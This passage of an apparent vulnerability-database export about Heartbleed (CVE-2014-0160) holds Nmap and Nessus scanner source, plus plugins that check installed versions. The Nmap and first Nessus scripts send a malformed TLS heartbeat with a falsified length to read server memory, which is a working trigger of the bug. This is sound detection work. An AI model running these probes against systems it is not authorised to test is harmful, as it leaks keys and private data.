library. \n\n## Example Usage \n \n \n nmap -p 443 --script ssl-heartbleed <target>\n \n\n## Script Output \n \n \n PORT STATE SERVICE\n 443/tcp open https\n | ssl-heartbleed:\n | VULNERABLE:\n | The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.\n | State: VULNERABLE\n | Risk factor: High\n | Description:\n | OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.\n |\n | References:\n | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160\n | http://www.openssl.org/news/secadv_20140407.txt\n |_ http://cvedetails.com/cve/2014-0160/\n \n \n\n## Requires \n\n * match\n * nmap\n * shortport\n * sslcert\n * stdnse\n * string\n * tableaux\n * vulns\n * tls\n\n* * *\n", "modified": "2018-11-06T15:07:01", "published": "2014-04-09T01:49:29", "id": "NMAP:SSL-HEARTBLEED.NSE", "href": "https://nmap.org/nsedoc/scripts/ssl-heartbleed.html", "title": "ssl-heartbleed NSE Script", "type": "nmap", "sourceData": "local match = require('match')\nlocal nmap = require('nmap')\nlocal shortport = require('shortport')\nlocal sslcert = require('sslcert')\nlocal stdnse = require('stdnse')\nlocal string = require \"string\"\nlocal tableaux = require \"tableaux\"\nlocal vulns = require('vulns')\nlocal have_tls, tls = pcall(require,'tls')\nassert(have_tls, \"This script requires the tls.lua library from https://nmap.org/nsedoc/lib/tls.html\")\n\ndescription = [[\nDetects whether a server is vulnerable to the OpenSSL Heartbleed bug (CVE-2014-0160).\nThe code is based on the Python script ssltest.py authored by Jared Stafford (jspenguin@jspenguin.org)\n]]\n\n---\n-- @usage\n-- nmap -p 443 --script ssl-heartbleed <target>\n--\n-- @output\n-- PORT STATE SERVICE\n-- 443/tcp open https\n-- | ssl-heartbleed:\n-- | VULNERABLE:\n-- | The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.\n-- | State: VULNERABLE\n-- | Risk factor: High\n-- | Description:\n-- | OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.\n-- |\n-- | References:\n-- | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160\n-- | http://www.openssl.org/news/secadv_20140407.txt\n-- |_ http://cvedetails.com/cve/2014-0160/\n--\n--\n-- @args ssl-heartbleed.protocols (default tries all) TLS 1.0, TLS 1.1, or TLS 1.2\n--\n\nauthor = \"Patrik Karlsson <patrik@cqure.net>\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = { \"vuln\", \"safe\" }\ndependencies = {\"https-redirect\"}\n\nlocal arg_protocols = stdnse.get_script_args(SCRIPT_NAME .. \".protocols\") or {'TLSv1.0', 'TLSv1.1', 'TLSv1.2'}\n\nportrule = function(host, port)\n return shortport.ssl(host, port) or sslcert.getPrepareTLSWithoutReconnect(port)\nend\n\nlocal function recvhdr(s)\n local status, hdr = s:receive_buf(match.numbytes(5), true)\n if not status then\n stdnse.debug3('Unexpected EOF receiving record header - server closed connection')\n return\n end\n local typ, ver, ln = string.unpack('>B I2 I2', hdr)\n return status, typ, ver, ln\nend\n\nlocal function recvmsg(s, len)\n local status, pay = s:receive_buf(match.numbytes(len), true)\n if not status then\n stdnse.debug3('Unexpected EOF receiving record payload - server closed connection')\n return\n end\n return true, pay\nend\n\nlocal function testversion(host, port, version)\n\n local hello = tls.client_hello({\n [\"protocol\"] = version,\n -- Claim to support every cipher\n -- Doesn't work with IIS, but IIS isn't vulnerable\n [\"ciphers\"] = tableaux.keys(tls.CIPHERS),\n [\"compressors\"] = {\"NULL\"},\n [\"extensions\"] = {\n -- Claim to support common elliptic curves\n [\"elliptic_curves\"] = tls.EXTENSION_HELPERS[\"elliptic_curves\"](tls.DEFAULT_ELLIPTIC_CURVES),\n [\"heartbeat\"] = \"\\x01\", -- peer_not_allowed_to_send\n },\n })\n\n local payload = \"Nmap ssl-heartbleed\"\n local hb = tls.record_write(\"heartbeat\", version, string.pack(\"B>I2\",\n 1, -- HeartbeatMessageType heartbeat_request\n 0x4000) -- payload length (falsified)\n -- payload length is based on 4096 - 16 bytes padding - 8 bytes packet\n -- header + 1 to overflow\n .. payload -- less than payload length.\n )\n\n local status, s, err\n local specialized = sslcert.getPrepareTLSWithoutReconnect(port)\n if specialized then\n status, s = specialized(host, port)\n if not status then\n stdnse.debug3(\"Connection to server failed: %s\", s)\n return\n end\n else\n s = nmap.new_socket()\n status, err = s:connect(host, port)\n if not status then\n stdnse.debug3(\"Connection to server failed: %s\", err)\n return\n end\n end\n\n s:set_timeout(5000)\n\n -- Send Client Hello to the target server\n status, err = s:send(hello)\n if not status then\n stdnse.debug1(\"Couldn't send Client Hello: %s\", err)\n s:close()\n return nil\n end\n\n -- Read response\n local done = false\n local supported = false\n local i = 1\n local response\n repeat\n status, response, err = tls.record_buffer(s, response, i)\n if err == \"TIMEOUT\" then\n -- Timed out while waiting for server_hello_done\n -- Could be client certificate required or other message required\n -- Let's just drop out and try sending the heartbeat anyway.\n done = true\n break\n elseif not status then\n stdnse.debug1(\"Couldn't receive: %s\", err)\n s:close()\n return nil\n end\n\n local record\n i, record = tls.record_read(response, i)\n if record == nil then\n stdnse.debug1(\"Unknown response from server\")\n s:close()\n return nil\n elseif record.protocol ~= version then\n stdnse.debug1(\"Protocol version mismatch\")\n s:close()\n return nil\n end\n\n if record.type == \"handshake\" then\n for _, body in ipairs(record.body) do\n if body.type == \"server_hello\" then\n if body.extensions and body.extensions[\"heartbeat\"] == \"\\x01\" then\n supported = true\n end\n elseif body.type == \"server_hello_done\" then\n stdnse.debug1(\"we're done!\")\n done = true\n end\n end\n end\n until done\n if not supported then\n stdnse.debug1(\"Server does not support TLS Heartbeat Requests.\")\n s:close()\n return nil\n end\n\n status, err = s:send(hb)\n if not status then\n stdnse.debug1(\"Couldn't send heartbeat request: %s\", err)\n s:close()\n return nil\n end\n while(true) do\n local status, typ, ver, len = recvhdr(s)\n if not status then\n stdnse.debug1('No heartbeat response received, server likely not vulnerable')\n break\n end\n if typ == 24 then\n local pay\n status, pay = recvmsg(s, 0x0fe9)\n s:close()\n if #pay > 3 then\n return true\n else\n stdnse.debug1('Server processed malformed heartbeat, but did not return any extra data.')\n break\n end\n elseif typ == 21 then\n stdnse.debug1('Server returned error, likely not vulnerable')\n break\n end\n end\n\nend\n\naction = function(host, port)\n local vuln_table = {\n title = \"The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.\",\n state = vulns.STATE.NOT_VULN,\n risk_factor = \"High\",\n description = [[\nOpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.\n ]],\n\n references = {\n 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160',\n 'http://www.openssl.org/news/secadv_20140407.txt ',\n 'http://cvedetails.com/cve/2014-0160/'\n }\n }\n\n local report = vulns.Report:new(SCRIPT_NAME, host, port)\n local test_vers = arg_protocols\n\n if type(test_vers) == 'string' then\n test_vers = { test_vers }\n end\n\n for _, ver in ipairs(test_vers) do\n if nil == tls.PROTOCOLS[ver] then\n return \"\\n Unsupported protocol version: \" .. ver\n end\n local status = testversion(host, port, ver)\n if ( status ) then\n vuln_table.state = vulns.STATE.VULN\n break\n end\n end\n\n return report:make_output(vuln_table)\nend\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "nessus": [{"lastseen": "2019-10-28T21:00:39", "bulletinFamily": "scanner", "description": "Based on its response to a TLS request with a specially crafted\nheartbeat message (RFC 6520), the remote service appears to be\naffected by an out-of-bounds read flaw.\n\nThis flaw could allow a remote attacker to read the contents of up to\n64KB of server memory, potentially exposing passwords, private keys,\nand other sensitive data.", "modified": "2014-04-08T00:00:00", "id": "OPENSSL_HEARTBLEED.NASL", "href": "https://www.tenable.com/plugins/nessus/73412", "published": "2014-04-08T00:00:00", "title": "OpenSSL Heartbeat Information Disclosure (Heartbleed)", "type": "nessus", "sourceData": "#TRUSTED 0be9cfb374ecd769aebab9757d91f5d5710ec45445e976f0861b08656a5084dcb2ef4eb378e4d33ea5607c8508377303f71c4ceee49c97a6c850cc58187d9ad76e8eb3c2039fb00ad7ee9bce6db384cfe3c04d1f6ea5149cbd02f9d0331b0b05988f67149f326d3d8c2cd08063af43f6ae050b33b08f7bc45c426f475a3b8156de7fc0ae5e043f39e223903f67e97f83055631c51dc2b15ac7090058706e38d8eff765f27a77a5f85a70ec820f52152003953172d82b26ef0e9c84fd1e1d13fb091ca0ce732f5274ddfd5d2c24e747e4f0949fe4da0974d8914c2ad5b04803c37f799d9f41ac57e7c2afef8ca35b6d93a62c7fbab118503134a70df20df911706d895980b82587ffc079d0b7051e6672abb647da9a2a848445897c5d8d030afacd786506192b1f19c7d159ae3a36de1bec8e0a796c4260464454cc74c8a9d6a9cbdb38d62176423bf5ec33e49e1e94b34b575c8612c4b8c34703cd6065d3491905211430a86e8fe19649f09ce40b2fcc6e5743ffd8a996ea2688d621eeb4adad740460593b4597e02d9d7750a0430aad340a962682cead26ae8f94e0169bde5671f5fe09906b9f610c253e159e21236a2d86ff6bde68353eb31a1f8a8a3c8f1fdbae161686ae9e831493e73259a4cf715853c26bbaf80ac2dd0530b5daede96585fab4ddca43dd095c5b563bdfec5e951c4f122d49790e5f08a0df95fc9d21cf\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73412);\n script_version(\"2.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2018/07/16\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_bugtraq_id(66690);\n script_xref(name:\"CERT\", value:\"720951\");\n script_xref(name:\"EDB-ID\", value:\"32745\");\n script_xref(name:\"EDB-ID\", value:\"32764\");\n script_xref(name:\"EDB-ID\", value:\"32791\");\n script_xref(name:\"EDB-ID\", value:\"32998\");\n\n script_name(english:\"OpenSSL Heartbeat Information Disclosure (Heartbleed)\");\n script_summary(english:\"Checks if the server incorrectly handles a malformed TLS heartbeat message\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote service is affected by an information disclosure\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"Based on its response to a TLS request with a specially crafted\nheartbeat message (RFC 6520), the remote service appears to be\naffected by an out-of-bounds read flaw.\n\nThis flaw could allow a remote attacker to read the contents of up to\n64KB of server memory, potentially exposing passwords, private keys,\nand other sensitive data.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://heartbleed.com/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://eprint.iacr.org/2014/140\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.openssl.org/news/vulnerabilities.html#2014-0160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20140407.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to OpenSSL 1.0.1g or later.\n\nAlternatively, recompile OpenSSL with the '-DOPENSSL_NO_HEARTBEATS'\nflag to disable the vulnerable functionality.\");\n \n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'OpenSSL Heartbeat (Heartbleed) Information Leak');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0160\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:openssl:openssl\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Misc.\");\n\n script_dependencies(\"ssl_supported_versions.nasl\");\n script_require_ports(443, \"SSL/Supported\");\n exit(0);\n}\n\ninclude(\"acap_func.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"ftp_func.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"imap_func.inc\");\ninclude(\"kerberos_func.inc\");\ninclude(\"ldap_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"nntp_func.inc\");\ninclude(\"pop3_func.inc\");\ninclude(\"smtp_func.inc\");\ninclude(\"ssl_funcs.inc\");\ninclude(\"telnet2_func.inc\");\ninclude(\"xmpp_func.inc\");\ninclude(\"audit.inc\");\ninclude(\"dump.inc\");\ninclude(\"data_protection.inc\");\n#\n# @remark RFC 6520\n#\n\nfunction heartbeat_ext()\n{\n local_var mode;\n\n mode = _FCT_ANON_ARGS[0];\n if(isnull(mode))\n mode = 1; # peer allowed to send requests\n\n return mkword(15) + # extension type\n mkword(1) + # extension length\n mkbyte(mode); # hearbeat mode\n}\n\nfunction heartbeat_req(payload, plen, pad)\n{\n local_var req;\n\n if(isnull(plen))\n plen = strlen(payload);\n\n\n req = mkbyte(1) + # HeartbeatMessageType: request\n mkword(plen) + # payload length\n payload + # payload\n pad; # random padding\n\n return req;\n\n}\n\n\nif ( get_kb_item(\"SSL/Supported\") )\n{\n port = get_ssl_ports(fork:TRUE);\n if (isnull(port))\n exit(1, \"The host does not appear to have any SSL-based services.\");\n\n # Check for TLS; extensions only available in TLSv1 and later\n ssl3 = tls10 = tls11 = tls12 = 0;\n\n list = get_kb_list('SSL/Transport/'+port);\n if(! isnull(list))\n {\n list = make_list(list);\n foreach encap (list)\n {\n if (encap == ENCAPS_SSLv3) ssl3 = 1;\n else if (encap == ENCAPS_TLSv1) tls10 = 1;\n else if (encap == COMPAT_ENCAPS_TLSv11) tls11 = 1;\n else if (encap == COMPAT_ENCAPS_TLSv12) tls12 = 1;\n }\n }\n\n if(! (ssl3 || tls10 || tls11 || tls12))\n exit(0, 'The SSL-based service listening on port '+port+' does not appear to support SSLv3 or above.');\n\n if (tls12) version = TLS_12;\n else if (tls11) version = TLS_11;\n else if (tls10) version = TLS_10;\n else if (ssl3) version = SSL_V3;\n}\nelse\n{\n if ( ! get_port_state(443) ) exit(1, \"No SSL port discovered and port 443 is closed\");\n port = 443;\n version = TLS_10;\n}\n\n\n# Open port\nsoc = open_sock_ssl(port);\nif ( ! soc ) exit(1, \"Failed to open an SSL socket on port \"+port+\".\");\n\nver = mkword(version);\nexts = heartbeat_ext() + tls_ext_ec() + tls_ext_ec_pt_fmt();\n\ncipherspec = NULL;\nforeach cipher (sort(keys(ciphers)))\n{\n if(strlen(ciphers[cipher]) == 2)\n {\n cipherspec += ciphers[cipher];\n }\n}\ncspeclen = mkword(strlen(cipherspec));\n\n# length of all extensions\nexts_len = mkword(strlen(exts));\nchello = client_hello(v2hello:FALSE, version:ver,\n extensions:exts,extensionslen:exts_len,\n cipherspec : cipherspec,\n cspeclen : cspeclen\n );\n\nsend(socket:soc, data: chello);\n\n# Read one record at a time. Expect to see at a minimum:\n# ServerHello, Certificate, and ServerHelloDone.\nhello_done = FALSE;\nwhile (!hello_done)\n{\n # Receive a record from the server.\n data = recv_ssl(socket:soc, timeout: 30);\n if (isnull(data))\n {\n close(soc);\n audit(AUDIT_RESP_NOT, port, 'an SSL ClientHello message');\n }\n\n # ServerHello: Extract the random data for computation of keys.\n rec = ssl_find(\n blob:data,\n 'content_type', SSL3_CONTENT_TYPE_HANDSHAKE,\n 'handshake_type', SSL3_HANDSHAKE_TYPE_SERVER_HELLO\n );\n\n if (!isnull(rec))\n {\n # Look for heartbeat mode in ServerHello\n heartbeat_mode = rec['extension_heartbeat_mode'];\n\n # Make sure we use an SSL version supported by the server\n if(rec['version'] != version && rec['version'] >= 0x0300 && rec['version'] <= 0x0303)\n version = rec['version'];\n }\n\n # Server Hello Done.\n rec = ssl_find(\n blob:data,\n 'content_type', SSL3_CONTENT_TYPE_HANDSHAKE,\n 'handshake_type', SSL3_HANDSHAKE_TYPE_SERVER_HELLO_DONE\n );\n\n if (!isnull(rec))\n {\n hello_done = TRUE;\n break;\n }\n}\nif(! hello_done)\n exit(1, 'ServerHelloDone not received from server listening on port ' + port+'.');\n\n# Check if TLS server supports heartbeat extension\nif(version != SSL_V3 && isnull(heartbeat_mode))\n exit(0, 'The SSL service listening on port ' + port + ' does not appear to support heartbeat extension.');\n\n# Check if TLS server willing to accept heartbeat requests\nif(version != SSL_V3 && heartbeat_mode != 1)\n exit(0, 'The SSL service listening on port ' + port + ' does not appear to accept heartbeat requests.');\n\n# Send a malformed heartbeat request\npayload = crap(data:'A', length:16);\npad = crap(data:'P',length:16);\nhb_req = heartbeat_req(payload: payload, plen:strlen(payload)+ strlen(pad)+0x4000, pad:pad);\nif ( version == SSL_V3 )\n rec = ssl_mk_record(type:24, data:hb_req, version:version);\nelse\n rec = tls_mk_record(type:24, data:hb_req, version:version);\nsend(socket:soc, data:rec);\nres = recv_ssl(socket:soc, partial:TRUE, timeout:30);\nclose(soc);\n\n# Patched TLS server does not respond\nif(isnull(res))\n audit(AUDIT_LISTEN_NOT_VULN, 'SSL service', port);\n\nif ( strlen(res) < 8 )\n exit(1, 'The service listening on port '+ port + ' returned a short SSL record.');\n\n# Got a response\n# Look for hearbeat response\nmsg = ord(res[5]);\nif(msg != 2)\n exit(1, 'The service listening on port '+ port + ' did not return a heartbeat response.');\n\n# TLS server overread past payload into the padding field\nif((payload + pad) >< res)\n{\n hb_res = substr(res, 8);\n hb_res -= (payload + pad);\n if(strlen(hb_res) > 0x1000)\n hb_res = substr(hb_res, 0, 0x1000 -1);\n\n report = 'Nessus was able to read the following memory from the remote service:\\n\\n' + data_protection::sanitize_user_full_redaction(output:hexdump(ddata:hb_res));\n security_warning(port:port, extra: report);\n}\n# Alert\nelse if(ord(res[0]) == 0x15)\n{\n exit(0, 'The service listening on port '+ port + ' returned an alert, which suggests the remote TLS service is not affected.');\n}\n# Unknown response\nelse audit(AUDIT_RESP_BAD, port);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-12-13T06:40:45", "bulletinFamily": "scanner", "description": "The Attachmate Reflection install on the remote host is affected by an\nout-of-bounds read error known as the ", "modified": "2019-12-02T00:00:00", "id": "ATTACHMATE_REFLECTION_HEARTBLEED.NASL", "href": "https://www.tenable.com/plugins/nessus/76309", "published": "2014-06-30T00:00:00", "title": "Attachmate Reflection Heartbeat Information Disclosure (Heartbleed)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(76309);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/11/26\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_bugtraq_id(66690);\n script_xref(name:\"CERT\", value:\"720951\");\n script_xref(name:\"EDB-ID\", value:\"32745\");\n script_xref(name:\"EDB-ID\", value:\"32764\");\n script_xref(name:\"EDB-ID\", value:\"32791\");\n script_xref(name:\"EDB-ID\", value:\"32998\");\n\n script_name(english:\"Attachmate Reflection Heartbeat Information Disclosure (Heartbleed)\");\n script_summary(english:\"Checks openssl.dll version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application on the remote host is affected by an information\ndisclosure vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Attachmate Reflection install on the remote host is affected by an\nout-of-bounds read error known as the 'Heartbleed Bug' in the included\nOpenSSL version.\n\nThis error is related to handling TLS heartbeat extensions that could\nallow an attacker to obtain sensitive information such as primary key\nmaterial, secondary key material, and other protected content.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.attachmate.com/techdocs/1708.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.attachmate.com/techdocs/2502.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.heartbleed.com\");\n script_set_attribute(attribute:\"see_also\", value:\"https://eprint.iacr.org/2014/140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/vulnerabilities.html#2014-0160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20140407.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Reflection 14.1 SP3 Update 1 (14.1.3.247) or 2014 R1 Hotfix\n4 (15.6.0.660) or greater.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0160\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/30\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:attachmate:reflection\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"Settings/ParanoidReport\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nport = kb_smb_transport();\nappname = 'Attachmate Reflection';\n\ndisplay_names = get_kb_list('SMB/Registry/HKLM/SOFTWARE/Microsoft/Windows/CurrentVersion/Uninstall/*/DisplayName');\n\nin_registry = FALSE;\n# Ignore Attachmate Reflection X in this plugin\nforeach key (display_names)\n if (\n \"Attachmate Reflection \" >< key\n &&\n \"Attachmate Reflection X \" >!< key\n ) in_registry = TRUE;\n\nif (!in_registry) audit(AUDIT_NOT_INST, appname);\n\nregistry_init();\nhklm = registry_hive_connect(hive:HKEY_LOCAL_MACHINE, exit_on_fail:TRUE);\n\npath = NULL;\n\nforeach key (keys(display_names))\n{\n display_name = display_names[key];\n\n if (\n \"Attachmate Reflection \" >!< display_name\n ||\n \"Attachmate Reflection X \" >< display_name\n )\n continue;\n key -= '/DisplayName';\n\n key -= 'SMB/Registry/HKLM/';\n key = str_replace(string:key, find:\"/\", replace:'\\\\');\n break;\n}\n\n# Very rough check on ver in registry\ndisplay_version_key = key + \"\\DisplayVersion\";\ndisplay_version = get_registry_value(handle:hklm, item:display_version_key);\nif (\n isnull(display_version) ||\n display_version !~ \"^(14\\.1\\.3|15\\.6)($|[^0-9])\"\n)\n{\n RegCloseKey(handle:hklm);\n close_registry();\n if (isnull(display_version))\n audit(AUDIT_UNKNOWN_APP_VER, appname);\n else\n audit(AUDIT_NOT_INST, appname + \"14.1.3.x / 2014 R1\");\n}\n\n# Get install dir\ninstall_location_key = key + \"\\InstallLocation\";\ninstall_location = get_registry_value(handle:hklm, item:install_location_key);\nif (isnull(install_location))\n{\n RegCloseKey(handle:hklm);\n close_registry();\n audit(AUDIT_PATH_NOT_DETERMINED, appname);\n}\nRegCloseKey(handle:hklm);\n\nitem = eregmatch(pattern:\"^(.+\\\\)[^\\\\]*$\", string:install_location);\nif (isnull(item))\n{\n close_registry();\n audit(AUDIT_PATH_NOT_DETERMINED, appname);\n}\nclose_registry(close:FALSE);\n\npath = item[1];\n\n# At the least, make sure a file exists\n# to verify the registry info a bit\nexe = path + \"openssl.dll\";\nexe_exists = hotfix_file_exists(path:exe);\nhotfix_check_fversion_end();\nif (!exe_exists) audit(AUDIT_FN_FAIL, \"hotfix_file_exists\", \"data that indicates the file '\"+exe+\"' is no longer present.\");\n\n# Parse out numeric version from registry entry version\n# Registry version is formatted like :\n# major.minor.{sp}{build}\n# where {sp} is one digit (for now) and {build} is three\nmatches = eregmatch(string:display_version, pattern:\"^(\\d+)\\.(\\d+)\\.(\\d+)(\\d{3})\");\nif (matches)\n{\n major = matches[1];\n minor = matches[2];\n sp = matches[3];\n build = matches[4];\n version = major + \".\" + minor + \".\" + sp + \".\" + build;\n}\nelse\n audit(AUDIT_UNKNOWN_APP_VER, appname);\n\n# 14.1.3.000 is 14 SP3 (earliest vuln)\n# 15.6.0.000 is 2014 R1 (earliest vuln)\n# Vendor states 14.1.3.247 / 15.6.0.660 is main app fix ver\nif (\n version =~ \"^14\\.\" && ver_compare(ver:version, fix:\"14.1.3.247\", strict:FALSE) < 0\n ||\n version =~ \"^15\\.\" && ver_compare(ver:version, fix:\"15.6.0.660\", strict:FALSE) < 0\n)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Product : ' + appname +\n '\\n Installed version : ' + version +\n '\\n Fixed version : Reflection 14.1 SP3 Update 1 (14.1.3.247) / 2014 R1 Hotfix 4 (15.6.0.660)' +\n '\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, appname, display_version);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-12-13T06:40:47", "bulletinFamily": "scanner", "description": "The BlackBerry Enterprise Service (BES) install on the remote host is\naffected by an out-of-bounds read error, known as the ", "modified": "2019-12-02T00:00:00", "id": "BLACKBERRY_ES_UDS_KB35882.NASL", "href": "https://www.tenable.com/plugins/nessus/73762", "published": "2014-04-29T00:00:00", "title": "BlackBerry Enterprise Service Information Disclosure (KB35882) (Heartbleed)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73762);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/11/26\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_bugtraq_id(66690);\n script_xref(name:\"CERT\", value:\"720951\");\n script_xref(name:\"EDB-ID\", value:\"32745\");\n script_xref(name:\"EDB-ID\", value:\"32764\");\n script_xref(name:\"EDB-ID\", value:\"32791\");\n script_xref(name:\"EDB-ID\", value:\"32998\");\n\n script_name(english:\"BlackBerry Enterprise Service Information Disclosure (KB35882) (Heartbleed)\");\n script_summary(english:\"Checks version of UDS tcnative-1.dll\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has an application that is affected by an\ninformation disclosure vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The BlackBerry Enterprise Service (BES) install on the remote host is\naffected by an out-of-bounds read error, known as the 'Heartbleed Bug'\nin the included OpenSSL version.\n\nThis error is related to handling TLS heartbeat extensions that could\nallow an attacker to obtain sensitive information such as primary key\nmaterial, secondary key material, and other protected content. Note\nthis affects both client and server modes of operation.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://salesforce.services.blackberry.com/kbredirect/KB35882\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.heartbleed.com\");\n script_set_attribute(attribute:\"see_also\", value:\"https://eprint.iacr.org/2014/140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/vulnerabilities.html#2014-0160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20140407.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the patch referred to in the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0160\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", 